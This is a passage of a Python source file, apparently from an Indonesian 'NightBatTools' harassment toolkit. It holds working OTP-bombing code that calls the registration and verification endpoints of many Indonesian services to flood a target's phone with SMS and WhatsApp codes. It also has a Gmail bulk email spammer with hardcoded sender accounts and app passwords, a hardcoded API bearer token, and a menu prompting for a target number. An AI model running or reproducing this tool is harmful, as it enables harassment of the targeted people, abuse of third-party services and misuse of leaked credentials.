        url = 'https://api.kickavenue.com/registers'
        headers = {
            'Host': 'api.kickavenue.com',
            'user-agent': agent,
            'accept': 'application/json, text/plain, */*',
            'content-type': 'application/json'
        }
        
        data = {
            'email': f'vindr{Ganzzhuruf}{angka}@gmail.com',
            'password': 'qVF2dG$TGgM._DN',
            'password_confirmation': 'qVF2dG$TGgM._DN',
            'mobile_number': f'+62{nomor}'
        }
        
        response = requests.post(url, json=data, headers=headers, timeout=10)
        
        if response.status_code == 200:
            user_data = response.json()
            data = user_data.get('data')
            
            if data:
                user_id = data.get('id')
                
                if user_id:
                    url2 = f'https://api.kickavenue.com/otp/send/sms/{user_id}'
                    requests.post(url2, json=user_id, headers={'Content-Type': 'application/json'}, timeout=10)
                    return True
        
        return False
    except:
        return False

def api_pinhome_wa(nomor):
    try:
        headers = {
            'Host': 'www.pinhome.id',
            'accept': 'application/json',
            'authorization': 'Bearer 13d2886acc908192d0c33325b44a617e5e3395481cc03cbfd67de34886399731',
            'content-type': 'application/json',
            'user-agent': agent,
            'origin': 'https://www.pinhome.id'
        }
        
        data = json.dumps({
            'accountType': 'customers',
            'countryCode': '62',
            'medium': 'whatsapp',
            'otpType': 'register',
            'phoneNumber': nomor
        })
        
        response = requests.post('https://www.pinhome.id/api/pinaccount/request/otp', headers=headers, data=data, timeout=10)
        return response.status_code == 200
    except:
        return False

def api_easycash_wa(nomor):
    try:
        headers = {
            'Host': 'loan.easycash.id',
            'platformtype': 'WEB',
            'user-agent': agent,
            'content-type': 'application/json'
        }
        
        data = json.dumps({
            'mobileNumber': f'0{nomor}',
            'notifType': 'SMS',
            'verificationPurpose': 'REGISTER_OR_LOGIN'
        })
        
        response = requests.post('https://loan.easycash.id/api/mobile/sendVerificationWithoutCaptcha', headers=headers, data=data, timeout=10)
        return response.status_code == 200
    except:
        return False

def spam_otp_whatsapp(nomor):
    apis = {
        'bisatopup': spam_otp_bisatopup,
        'titipku': spam_otp_titipku,
        'jogjakita': spam_otp_jogjakita,
        'candireload': spam_otp_candireload,
        'speedcash': spam_otp_speedcash,
        'kerbel': spam_otp_kerbel,
        'mitradelta': spam_otp_mitradelta,
        'agenpayment': spam_otp_agenpayment,
        'z4reload': spam_otp_z4reload,
        'singa': spam_otp_singa,
        'ktakilat': spam_otp_ktakilat,
        'uangme': spam_otp_uangme,
        'cairin': spam_otp_cairin,
        'adiraku': spam_otp_adiraku,
        'tokopedia': spam_otp_tokopedia,
        'carsome': spam_otp_carsome,
        'misteraladin': spam_otp_misteraladin,
        'sayurbox': spam_otp_sayurbox,
        'kickavenue': api_kickavenue_wa,
        'pinhome': api_pinhome_wa,
        'easycash': api_easycash_wa
    }
    
    print()
    
    sukses = 0
    gagal = 0
    
    for nama_api, fungsi_api in apis.items():
        try:
            if fungsi_api(nomor):
                print(f'{a}[ {h}✓{a} ]{p} {nama_api:<14} → {h}BERHASIL - {p}{nomor}')
                sukses += 1
            else:
                print(f'{a}[ {m}∅{a} ]{p} {nama_api:<14} → {m}GAGAL')
                gagal += 1
        except Exception as e:
            print(f'{a}[ {m}∅{a} ]{p} {nama_api:<14} → {m}GAGAL')
            gagal += 1
    
    print(f'\n{a}==================================================')
    print(f'{k}Total: {h}{sukses}{a} Berhasil {a}| {m}{gagal}{a} Gagal {a}| \x1b[101m\x1b[1;32m ENTER \x1b[0m')
    input(f'{a}=================================================={p}')

def spam_otp_main():
    os.system('clear')
    
    # Banner display code omitted for brevity
    print('\x1b[1;30m\n⠀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⣠⣤⣤⣶⠶⠟⠛⠉⠉\n⠉⠉⠉⠛⠻⠶⣶⣦⣤⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣠⣤⣶⣾⡿⠟⠋⠉⠀⠀⠀⠀⠀⠀⠀\n⠀⠀⠀⠀⠀⠀⠀⠈⠉⠛⠿⣿⣶⣦⣄⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⣤⣶⣿⣿⣿⡿⠋⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\n⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠻⣿⣿⣿⣿⣤⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣠⣿⣿⣿⣿⣿⣿⠟⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\n⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠻⣿⣿⣿⣿⣿⣶⣤⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣠⣾⣿⣿⣿⣿⣿⡿⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\n⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠙⣿⣿⣿⣿⣿⣿⣿⣶⣦⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⢶⣿⣿⣿⣿⣿⣿⣿⣿⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\n⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⣿⣿⣿⣿⣿⣿⣿⣿⠏⠉⢢⡀⠀⡄⠀⢰⠀⠀⡾⡵⡄⣿⣿⣿⣿⣿⣿⣿⣿⣿⠄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\n⠀⠀⠀⠀⠀⢀⣀⣀⣀⡀⠀⠀⠀⠀⠀⣀⣠⣾⣿⣿⣿⣿⣿⣿⣿⣿⠀⡦⠜⠁⢸⣧⣤⣿⡆⠀⠁⠉⣀⣾⣿⣿⣿⣿⣿⣿⣿⣿⣷⣦⣤⣤⣤⣤⣤⡤⠄⠀⠀⠀⠀⠀⠀⠀⠀\n⠀⠀⠀⠀⠈⠉⠉⠉⠉⠉⠉⠛⠛⠿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣦⣄⣀⣼⣿⣿⣿⣷⣠⣴⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠿⠛⠋⠉⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\n⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠹⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠿⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\n⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠏⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\n⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣿⠿⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\n⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣿⠟⠉⠀⠀⠀⠀⠀⠉⠙⠻⣷⣿⣿⣿⣿⣿⣿⣿⣿⡿⠿⠛⠟⠿⠿⣿⣿⣇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\n⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣰⠟⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠛⢿⣿⣿⣿⣿⡿⠋⠀⠀⠀⠀⠀⠀⠀⠉⠛⠂⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\n⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⢻⣿⣿⡿⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\n⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⣿⣿⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\n⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢹⡿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\n⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\n                               ⠀⢸\n         \n                          [ \x1b[1;33mSPAM OTP \x1b[1;30m]\n')
    
    nomor = input(f'{a}[{k}?{a}]{p} Masukkan Nomor Target {a}:{p} ').strip()
    
    if not nomor:
        print(f'{m}[!] Nomor tidak boleh kosong!{p}')
        return
    
    if nomor.startswith('0'):
        nomor = '62' + nomor[1:]
    elif nomor.startswith('+62'):
        nomor = nomor[1:]
    elif not nomor.startswith('62'):
        nomor = '62' + nomor
    
    spam_otp_whatsapp(nomor)

# Email spam functions
def gmail_spam_get_random_messages():
    return [
        "Hey! Hope you're having a great day!",
        'Just wanted to say hello and check in with you.',
        'Thinking of you today. Hope everything is going well!',
        "You're awesome! Keep being amazing!",
        'Sending positive vibes your way!',
        'Hope your day is as wonderful as you are!',
        'Just a quick message to brighten your day!',
        "You've got this! Stay strong!",
        'Wishing you a fantastic day ahead!',
        "Keep smiling! You're doing great!",
        'Just wanted to remind you how awesome you are!',
        "Hope you're doing well! Take care!",
        'Sending good energy your way today!',
        "You're incredible! Don't forget that!",
        'Have an amazing day! You deserve it!',
        "Just checking in to say you're appreciated!",
        "Keep up the great work! You're killing it!",
        'Hope this message makes you smile!',
        "You're stronger than you think!",
        "Believe in yourself! You're amazing!"
    ]

def gmail_spam_get_subjects():
    return [
        'Hello!',
        'Important Update',
        'Quick Question',
        'Follow Up',
        'Regarding Your Inquiry',
        'Just Checking In',
        'Reminder',
        'Meeting Request',
        'Information You Requested',
        'Update on Your Request',
        'Thank You',
        'Confirmation',
        'Schedule Update',
        'Quick Update',
        'Response Needed'
    ]

def gmail_spam_create_body(message):
    current_date = datetime.now().strftime('%A, %B %d, %Y at %I:%M %p')
    body = f'{message}\n\n━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━\n\nMessage From NightBatTools — Anonymous\nDate : {current_date}\n\n━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━\n'
    return body

def gmail_spam_randomize_message(message):
    variations = [
        message,
        message + ' ',
        ' ' + message,
        message + '  '
    ]
    return random.choice(variations)

def gmail_spam_send_email(sender_email, sender_password, recipient_email, subject, message, task_number):
    try:
        msg = MIMEMultipart()
        msg['From'] = sender_email
        msg['To'] = recipient_email
        msg['Subject'] = subject
        
        randomized_message = gmail_spam_randomize_message(message)
        body = gmail_spam_create_body(randomized_message)
        
        msg.attach(MIMEText(body, 'plain'))
        
        server = smtplib.SMTP('smtp.gmail.com', 587)
        server.starttls()
        server.login(sender_email, sender_password)
        
        text = msg.as_string()
        server.sendmail(sender_email, recipient_email, text)
        server.quit()
        
        return (task_number, True)
    except Exception:
        return (task_number, False)

def gmail_spam_send_email_random_subject(sender_email, sender_password, recipient_email, message, task_number):
    subjects = gmail_spam_get_subjects()
    subject = random.choice(subjects)
    return gmail_spam_send_email(sender_email, sender_password, recipient_email, subject, message, task_number)

def gmail_spam_brutal_main():
    # Email accounts (abbreviated for space)
    senders = [
        ('daemoniumuser@gmail.com', 'wgas iris atyy xpnc'),
        ('daemoniumuserv2@gmail.com', 'yexa nkvy ghqh hsbd'),
        ('daemontechx@gmail.com', 'jxov iorq ztpw hirz'),
        # ... (all other email accounts)
    ]
    
    os.system('clear')
    
    # Banner display code omitted for brevity
    print(''.join([
        m,
        '\n╭────────────────────────────────────────────────────────────────────╮\n│  ',
        a, ' ⢠⣤⡄⢤⡠⢤⢠⠤⡄⡤⢤⠠⣄⠤⣠⣤⡄⠀⠀⠀⠀⣀⣤⣤⣤⣀⡀⠀⠀⣀⣀⣀⡀⠀⠀⠀⠀⠀⣀⣀⣀⠀⢀⣀⣀⣀⣀⣀⣀⣀⣀⡀⣀⣀⣀⣀⣀⣀⣀⠀⠀⠀   ',
        m, '│\n',
        m, '│   ',
        a, '⢸⠍⠛⢦⡉⠫⣏⣿⢿⣿⠻⡟⣉⣶⠞⠋⡇⠀⠀⣴⣿⣿⠿⠿⠿⢿⣿⠁⠀⣿⣿⣿⣿⡄⠀⠀⢀⣾⣿⣿⣿⠀⠿⠿⠿⢿⣿⣿⠿⠿⠿⠂⣽⣿⣿⠿⠿⠿⣿⣿⣆⡀   ',
        m, '│\n',
        m, '│  ',
        a, ' ⢸⠂⠀⠀⠘⠳⢬⡓⢮⣽⣽⠾⠋⠁⠀⠀⡇⠀⠀⣿⣿⣿⣀⠀⠀⠀⠁⠀⠀⣿⣿⣿⣿⣿⡄⠀⣼⣿⣿⣿⣿⠀⠀⠀⠀⢸⣿⣿⡁⠀⠀⠀⣻⣿⣿⠀⠀⠀⢸⣿⣿⠀   ',
        m, '│\n',
        m, '│  ',
        a, ' ⢸⡁⠀⠀⠀⠀⠀⣹⡶⠛⠁⠀⠀⠀⠀⠀⡇⠀⠀⠈⠻⢿⣿⣿⣾⣶⣄⠀⠀⣿⣿⡟⢻⣿⣷⣾⣿⣟⢻⣿⣿⠀⠀⠀⠀⢸⣿⣿⡁⠀⠀⠀⣿⣿⣿⣶⣶⣶⣿⣿⡿⠁   ',
        m, '│\n',
        m, '│  ',
        a, ' ⢸⠄⠀⠀⣠⡴⠋⠉⠀⠀⢀⣤⠆⠀⠀⠀⡇⠀⠀⡀⠀⠀⠀⠉⠙⣿⣿⣧⠀⣿⣿⡇⠀⢻⣿⣿⡿⠁⢸⣿⣿⠀⠀⠀⠀⢸⣿⣿⡁⠀⠀⠀⣽⣿⣿⠛⠛⠋⠉⠉⠀⠀   ',
        m,
        # ... (rest of banner)
    ]))
    
    # Rest of function omitted for space - contains thread pooling for email sending

# Other functions (ngl_spam, spam_call, etc.) omitted for brevity

def utama():
    pilihan_sekarang = 0
    
    while True:
        tampilkan_menu(pilihan_sekarang)
        
        try:
            key = input()
            
            if key == '\x1b[A':  # Up arrow
                pilihan_sekarang = (pilihan_sekarang - 1) % len(daftar_menu)
            elif key == '\x1b[B':  # Down arrow
                pilihan_sekarang = (pilihan_sekarang + 1) % len(daftar_menu)
            elif key == '\r':  # Enter
                if pilihan_sekarang == 0:
                    spam_bot_telegram_main()
                elif pilihan_sekarang == 1:
                    spam_otp_main()
                elif pilihan_sekarang == 6:
                    chat_admin()
                elif pilihan_sekarang == 7:
                    tampilkan_cursor()
                    sys.exit(0)
        
        except EOFError:
            tampilkan_cursor()
            utama()
        except KeyboardInterrupt:
            tampilkan_cursor()
            utama()

# Main entry point
if __name__ == '__main__':
    try:
        if check_device_auth():
            utama()
        else:
            sys.exit(0)
    except EOFError:
        tampilkan_cursor()
        utama()
    except KeyboardInterrupt:
        tampilkan_cursor()
        utama()